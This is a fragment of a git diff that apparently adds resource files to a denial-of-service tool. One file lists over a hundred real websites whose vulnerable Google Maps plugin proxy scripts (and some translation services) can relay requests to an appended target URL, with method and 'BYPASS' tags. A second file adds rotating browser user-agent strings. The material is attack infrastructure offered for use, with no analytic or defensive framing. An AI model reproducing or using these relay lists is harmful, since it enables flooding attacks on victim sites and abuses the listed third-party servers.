+http://ijzerhandeljanssen.nl/web/plugins/content/plugin_googlemap2_proxy.php?url= +http://kobbeleia.net/joomla/plugins/content/plugin_googlemap2_proxy.php?url= +http://krd-medway.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= +http://link2europe.com/joomla/plugins/content/plugin_googlemap2_proxy.php?url= +http://minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url= +http://old.ucpb.org/plugins/content/plugin_googlemap2_proxy.php?url= +http://peelmc.ca/plugins/content/plugin_googlemap2_proxy.php?url= +http://s2p.lt/main/plugins/content/plugin_googlemap2_proxy.php?url= +http://smartonecity.com/pt/plugins/content/plugin_googlemap2_proxy.php?url= +http://snelderssport.nl/web/plugins/content/plugin_googlemap2_proxy.php?url= +http://sunnyhillsassistedliving.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://thevintagechurch.com/www2/index.php?url=/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.abc-haus.ch/reinigung/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.abs-silos.de/en/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.admksg.ru/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.alhambrahotel.net/site/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.aliento.ch/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.autoklyszewski.pl/autoklyszewski/mambots/content/plugin_googlemap2_proxy.php?url= +http://www.build.or.at/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.caiverbano.it/sito/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.cbcstittsville.com/home/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.ciutatdeivissa.org/portal/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.contrau.com.br/web/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.dierenhotelspaubeek.nl/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.fotorima.com/rima/site2/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.gaston-schul.nl/DU/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.gaston-schul.nl/FR/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.gillinghamgurdwara.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.gilmeuble.ch/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.hortonmccormick.com/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.icel.be/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.idea-designer.com/idea/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.jana-wagenknecht.de/wcms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.kanzlei-berendes.de/homepage/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.kita-spielhaus.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.kjg-hemer.de/joomla/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.labonnevie-guesthouse-jersey.com/site/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.lacasaencarilo.com.ar/sitio/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.losaromos-spa.com.ar/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.losaromos-spa.com.ar/~losaromo/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.nickclift.co.uk/web/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.oliebollen.me/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.palagini.it/palagini/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.paro-nl.com/v2/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.parsifaldisco.com/joomla/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.podosys.com/csm/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.precak.sk/penzion/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.pyrenees-cerdagne.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.renault-windisch.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.rethinkingjournalism.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.riegler-dorner.at/joomla/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.sealyham.sk/joomla/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.seevilla-dr-sturm.at/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.siroki.it/newsite/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.sounders.es/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.suelcasa.com/suelcasa/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.tcl.lu/Site/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.tijssen-staal.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.triatarim.com.tr/TriaEn/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.tus-haltern.de/site/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.uchlhr.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.virmcc.de/joomla/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.visitsliven.com/bg/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.vm-esslingen.de/cms/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.yigilca.gov.tr/_tr/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.zahnarzt-buhl.de/praxis/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.sultanpalace.nl/site/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.bergenpol.com/cms//plugins/content/plugin_googlemap2_proxy.php?url= +http://www.arantzabelaikastola.com/webgunea//plugins/content/plugin_googlemap2_proxy.php?url= +http://www.fare-furore.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.dog-ryusen.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.dunaexpert.hu/home/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.spvgg-roedersheim.de/web/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.stephanus-web.de/joomla1015/mambots/content/plugin_googlemap2_proxy.php?url= +http://www.dahlnet.no/v2/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://ping-admin.ru/index.sema;POST;ping-admin.ru.txt +http://web-sniffer.net/?url= +http://www.map-mc.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://sova-tour.com.ua/plugins/system/plugin_googlemap2_proxy.php?url= +http://diegoborba.com.br/andes/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://karismatic.com.my/new/plugins/content/plugin_googlemap2_proxy.php?url= +http://scu-oldesloe.de/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://www.awf.co.nz/plugins/system/plugin_googlemap3_proxy.php?url= +http://translate.yandex.ru/translate?srv=yasearch&lang=ru-uk&url= +http://translate.yandex.ua/translate?srv=yasearch&lang=ru-uk&url= +http://translate.yandex.net/tr-url/ru-uk.uk/ +http://www.oldbrogue.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://www.mcdp.eu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://www.phimedia.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://www.bongert.lu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://laresmadrid.org/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://www.epcelektrik.com/en/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://doleorganic.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://crawfordlivestock.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.aculaval.com/joomla/plugins/system/plugin_googlemap2_proxy.php?url= +http://grandsultansaloon.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.d1010449.cp.blacknight.com/cpr.ie/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.architettaresas.it/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://basketgbkoekelare.be/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.arbitresmultisports.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://mobilrecord.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.oldbrogue.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://www.mcdp.eu/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://www.dbaa.co.za/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://waggum-bevenrode.sg-bevenrode.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://bwsnt1.pdsda.net/plugins/system/plugin_googlemap3_proxy.php?url= +http://www.astecdisseny.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.fillmorefairways.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.bus-reichert.eu/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.maxxxi.ru/plugins/system/plugin_googlemap2_proxy.php?url= +http://potholepeople.co.nz/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.hammondgolf.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.footgoal33.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.printingit.ie/plugins/content/plugin_googlemap2_proxy.php?url= +http://bbtoma.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://www.tajmahalrestaurant.co.za/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.yerbabuenacuisine.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.rinner-alm.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://stockbridgetownhall.co.uk/plugins/content/plugin_googlemap2_proxy.php?url= +http://mentzerrepairs.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.tilmouthwell.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.homevisionsinc.com/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://toddlers.nalanda.edu.in/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://cultura-city.rv.ua/plugins/system/plugin_googlemap3_proxy.php?url= +http://secret.leylines.info/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://bike-electric.co.uk/plugins/system/plugin_googlemap3/plugin_googlemap3_proxy.php?url= +http://www.centroaquaria.com/plugins/content/plugin_googlemap2_proxy.php?url= +http://agenzia-anna.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.gretnadrug.com/plugins/system/plugin_googlemap2_proxy.php?url= +http://www.crestwoodpediatric.com/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php?url= +http://www.oceans-wien.com/plugins/system/plugin_googlemap2_proxy.php?url=;BYPASS \ No newline at end of file diff --git a/user-agents.txt b/user-agents.txt new file mode 100644 index 0000000..459d795 --- /dev/null +++ b/user-agents.txt @@ -0,0 +1,75 @@ +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7 +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 +Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0 +Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.8 (KHTML, like Gecko) Version/9.1.3 Safari/601.7.8 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 +Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/601.6.17 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.17 +Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/51.0.2704.79 Chrome/51.0.2704.79 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (Windows NT 6.3; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0 +Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50 +Mozilla/5.0 (Windows NT 6.1; rv:48.0) Gecko/20100101 Firefox/48.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:48.0) Gecko/20100101 Firefox/48.0 +Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 +Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:47.0) Gecko/20100101 Firefox/47.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393 +Mozilla/5.0 (Windows NT 6.3; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 +Mozilla/5.0 (iPad; CPU OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G35 Safari/601.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17 +Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; rv:47.0) Gecko/20100101 Firefox/47.0 +Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (iPad; CPU OS 9_3_5 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G36 Safari/601.1 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 +Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.92 Safari/537.36 +Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0) +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36 +Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (Windows NT 5.1; rv:48.0) Gecko/20100101 Firefox/48.0 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/537.86.7 +Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0 +Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36 +Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.101 Safari/537.36 +Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36 OPR/39.0.2256.48 +Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 +Mozilla/5.0 (X11; CrOS x86_64 8350.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36